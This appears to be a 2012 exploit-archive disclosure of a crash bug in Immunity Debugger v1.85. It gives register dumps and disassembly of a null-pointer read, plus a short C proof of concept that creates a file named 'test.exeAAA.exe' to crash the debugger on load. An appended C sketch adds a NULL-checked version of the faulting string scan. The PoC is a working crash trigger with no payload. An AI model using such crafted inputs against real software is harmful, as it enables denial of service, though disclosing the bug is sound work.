Immunity Debugger v1.85 32-bit Memory Corruption
Source: facebook.com/Ayrbyte  Author: Ayrbyte  Published: 2012-06-08
////////////////////////////////////////////////////////////////////////////////
//Title: Immunity Debugger v1.85 32-bit Memory Corruption
//Author: Ayrbyte
//Link: debugger.immunityinc.com
//Version: v1.85
//Tested on: Windows 7
//Fb: facebook.com/Ayrbyte
//Greetz To : R31tuz, 3|_^^1x, XerkusR, Clan X-BX, and all CREMY Family
//
//    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
//   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
//  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
// ??   ??    %% $$$$  ||  ||     > ::    ;;
//      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
//    ______________>>Ayrbyte<<_______________
//   Gamerz From CREMY | CRazy Experience arMY
////////////////////////////////////////////////////////////////////////////////
//[register]
//EAX 00000000
//ECX 00000000
//EDX 0022DFE0
//EBX 0022DB70 ASCII ".exe"
//ESP 0022C0C4
//EBP 0022D864 ASCII "test.exe"
//ESI 0022DFB8 ASCII "C:\Users\R1d3Rw13c\Desktop\test.exeAAA.exe"
//EDI 0022DFDB ASCII ".exe"
//EIP 777E49F6 ntdll.777E49F6
//
//[disassembly]
//779349D4   test        ecx,3
//779349DA   je          779349F6
//779349DC   mov         al,byte ptr [ecx]
//779349DE   add         ecx,1
//779349E1   test        al,al
//779349E3   je          77934A2B
//779349E5   test        ecx,3
//779349EB   jne         779349DC
//779349ED   add         eax,0
//779349F0   lea         esp,[esp]
//779349F3   lea         esp,[esp]
//779349F6   mov         eax,dword ptr [ecx]; ECX=00000000 ds:[00000000]=??? <--NullPointer
//779349F8   mov         edx,7EFEFEFFh
//779349FD   add         edx,eax
//779349FF   xor         eax,0FFh
//77934A02   xor         eax,edx
//77934A04   add         ecx,4
//77934A07   test        eax,81010100h
//77934A0C   je          779349F6
//77934A0E   mov         eax,dword ptr [ecx-4]
//
//Unhandled exception in ImmunityDebugger.exe (NTDLL.DLL): 0xC0000005: Access Violation
//Immunity does not handle the filename test.exeAAA: the "AAA" after .exe is also taken as input.
//At offset 779349F6, mov eax,dword ptr [ecx] runs with ECX = 00000000 (ds:[00000000]=???), a null pointer,
//which makes the program crash.
////////////////////////////////////////////////////////////////////////////////

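#include <cstdio>   // FILE, fopen, fputs, fclose, perror
using namespace std;

// File content; the bytes decode to "CREMY | CRazy Experience arMY".
char _isi[] =   "\x43\x52\x45\x4D\x59\x20\x7C\x20\x43\x52\x61\x7A\x79\x20"
                "\x45\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x20\x61\x72\x4D\x59";
int main(){
    // Create the file test.exeAAA.exe, then run it in Immunity Debugger
    #define _namefile "test.exeAAA.exe"
    FILE *_file = fopen(_namefile, "w");
    if (_file == NULL) {    // fopen failed, e.g. the directory is not writable
        perror(_namefile);
        return 1;
    }
    fputs(_isi, _file);
    fclose(_file);
    return 0;
}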
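
The disassembly in the header has the shape of a word-at-a-time string-length scan (the 7EFEFEFFh / 81010100h zero-byte test), and it loads from [ecx] with no NULL check. The C sketch below is an added example, not the author's code and not Immunity's: it mirrors that loop and puts a NULL and termination guard in front of it. The names `may_have_zero`, `word_scan_len` and `checked_len` are hypothetical, and how the debugger comes to pass a null pointer is not stated on this page.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Zero-byte test from 779349F8..77934A07. Assumption: the listing's
   "xor eax,0FFh" is a sign-extended imm8, i.e. xor eax,0FFFFFFFFh (~w). */
static uint32_t may_have_zero(uint32_t w)
{
    return ((w + 0x7EFEFEFFu) ^ ~w) & 0x81010100u;
}

/* Word-at-a-time scan of cap bytes; returns cap if no terminator is found. */
static size_t word_scan_len(const char *buf, size_t cap)
{
    size_t i = 0;
    for (; i + 4 <= cap; i += 4) {          /* add ecx,4 */
        uint32_t w;
        memcpy(&w, buf + i, 4);             /* mov eax,dword ptr [ecx] */
        if (!may_have_zero(w))
            continue;                       /* je 779349F6 */
        for (size_t k = 0; k < 4; k++)      /* test can false-positive: confirm */
            if (buf[i + k] == '\0')
                return i + k;
    }
    for (; i < cap; i++)                    /* tail shorter than one word */
        if (buf[i] == '\0')
            return i;
    return cap;
}

/* Hypothetical hardened caller: 0 = ok, -1 = NULL argument, -2 = unterminated. */
static int checked_len(const char *buf, size_t cap, size_t *out)
{
    if (buf == NULL || out == NULL)
        return -1;                          /* the listed scan has no such check */
    *out = word_scan_len(buf, cap);
    return (*out == cap) ? -2 : 0;
}

int main(void)
{
    char name[16] = "test.exeAAA.exe";      /* file name used by the PoC */
    size_t n = 0;
    printf("rc=%d len=%zu\n", checked_len(name, sizeof name, &n), n);
    printf("rc=%d (NULL)\n", checked_len(NULL, 0, &n));
    return 0;
}
```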
